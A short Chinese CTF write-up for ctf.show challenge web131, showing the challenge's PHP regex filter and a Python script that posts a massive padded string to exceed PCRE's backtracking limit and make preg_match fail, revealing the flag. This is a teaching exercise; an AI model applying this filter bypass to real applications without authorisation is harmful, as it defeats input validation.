web131笔记(回溯次数上限+string函数) 

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-13 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-13 05:19:40

*/


error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['f'])){
    $f = (String)$_POST['f'];

    if(preg_match('/.+?ctfshow/is', $f)){
        die('bye!');
    }
    if(stripos($f,'36Dctfshow') === FALSE){
        die('bye!!');
    }

    echo $flag;

}

这次加了string函数,用上题脚本改一下就可以,一样利用正则的回溯次数

#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/2/27 17:52
# blog: www.wlhhlc.top
import requests
url = "http://9b9aa879-e1b7-4f83-9c38-ea3132ac969b.chall.ctf.show:8080/"
data = {
    'f': 'mmmmmmmm'*170000+'36Dctfshow'
}
res = requests.post(url=url,data=data)
print(res.text)

 

posted @ 2025-03-28 15:53  justdoIT*  阅读(9)  评论(0)    收藏  举报